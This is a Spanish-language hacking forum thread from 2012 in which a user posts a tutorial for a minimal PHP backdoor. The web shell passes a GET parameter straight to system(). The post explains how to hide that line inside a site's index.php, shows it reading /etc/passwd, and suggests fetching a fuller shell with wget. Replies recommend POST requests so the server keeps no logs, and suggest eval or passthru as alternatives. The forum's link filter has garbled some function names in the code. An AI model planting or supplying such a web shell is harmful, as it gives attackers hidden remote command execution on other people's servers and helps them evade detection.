comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Creando un minibackdoor en PHP

  • 10 Respuestas
  • 4718 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« en: Noviembre 24, 2012, 04:19:32 pm »
 Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
Código: PHP
  1. <form method="GET" action="lol.php">
  2. <input type="text" name="comando">
  3. <input type="submit" value="ejecutar">
  4. <?php
  5. if(You are not allowed to view links. Register or Login($_GET['comando']));
  6. {
  7. $lol = @You are not allowed to view links. Register or Login($_GET['comando']);
  8.  
  9.  
  10. echo $lol;
  11. }
  12. ?>
En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:



Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
Código: PHP
  1. $lol = @You are not allowed to view links. Register or Login($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd

y ejecutaria lo que es el comando.
Agradecimientos: Oggy & HD_Breaker
Espero que les haya gustado.
Un saludo.
« Última modificación: Noviembre 23, 2014, 02:50:56 pm por Expermicid »
Underc0de Manager!

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #1 en: Noviembre 24, 2012, 05:13:31 pm »
Esta bien el script sencillo,pero util aunque yo usaria la función passthru enmes de system sobretodo para linux ademas lo suelta en bruto.
Saludos
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Noviembre 24, 2012, 08:30:10 pm »
Bien hecho Okol! Linda shell! Yo usar POST, para q no quede guardado en los log al visitar la shell ;)

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #3 en: Noviembre 24, 2012, 08:52:19 pm »
Buena esa man  8)
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Conectado ~ Yoya ~

  • *
  • Underc0der
  • Mensajes: 152
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Noviembre 25, 2012, 01:55:00 am »
En vez de system, debieras reemplazarlo con eval(). Razón?? Simplemente porque system te permite ejecutar comando del sistema, en cambio eval te permite ejecutar un código PHP.

You are not allowed to view links. Register or Login

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Desconectado Adastra

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
  • Endless Learner
    • Ver Perfil
    • thehackerway
    • Email
« Respuesta #5 en: Noviembre 25, 2012, 09:15:29 am »
Esta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net

You are not allowed to view links. Register or Login

 
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

"Nunca discutas con un idiota, podria no notarse la diferencia"
Kant.

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #6 en: Noviembre 26, 2012, 11:59:26 am »
está genial la explicación, éste minituto para los que recién empezamos :D

Citar
Esta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net

You are not allowed to view links. Register or Login

el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-

saludos!

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #7 en: Noviembre 26, 2012, 05:34:33 pm »
You are not allowed to view links. Register or Login
está genial la explicación, éste minituto para los que recién empezamos :D

Citar
Esta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en pentestmonkey.net

You are not allowed to view links. Register or Login

el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-

saludos!
Muchas gracias por tu aclaración a ese usuario alex.
No estoy diciendo cual es la mejor forma, simplemente explique una.
Saludos.
Underc0de Manager!

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #8 en: Noviembre 27, 2012, 02:56:12 pm »
El hecho de utilizar tus propias herramientas te hace resaltar del resto, no es reinventar la rueda, es independizarse, esto te convertira en mejor hacker y mejor programador, y ser menos lammer y vivir de herramientas que otros crearon.

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Adastra

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
  • Endless Learner
    • Ver Perfil
    • thehackerway
    • Email
« Respuesta #9 en: Noviembre 27, 2012, 03:51:07 pm »
Ok, no es mi intención restar importancia a este aporte, ni tampoco  desvalorizar el esfuerzo del usuario que ha creado este post (no soy quien para hacerlo) sin embargo, me pregunto, donde esta la backdoor? donde esta la vulnerabilidad que se ha explotado para crearla? es una RFI/LFI? es una vulnerabilidad del servidor o de una aplicación web concreta? lo que quiero decir, es que el aporte se resume en esto:

Código: You are not allowed to view links. Register or Login
@system('comando');
Y ojo, que no se trata de una critica ni estoy cuestionando a nadie, no es para que os pongáis a la defensiva  ;) solamente digo que tras leer el titulo del post, esperaba mucho más (como la explotación de una vulnerabilidad para crear una mini-backdoor), pero bueno, estoy seguro que a una persona que comienza a aprender a programar en PHP le será muy útil.

Saludos.  :)
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

"Nunca discutas con un idiota, podria no notarse la diferencia"
Kant.

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #10 en: Noviembre 27, 2012, 04:03:07 pm »
Fin de ronda.
No más llevense bien , cierro tema.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

 

¿Te gustó el post? COMPARTILO!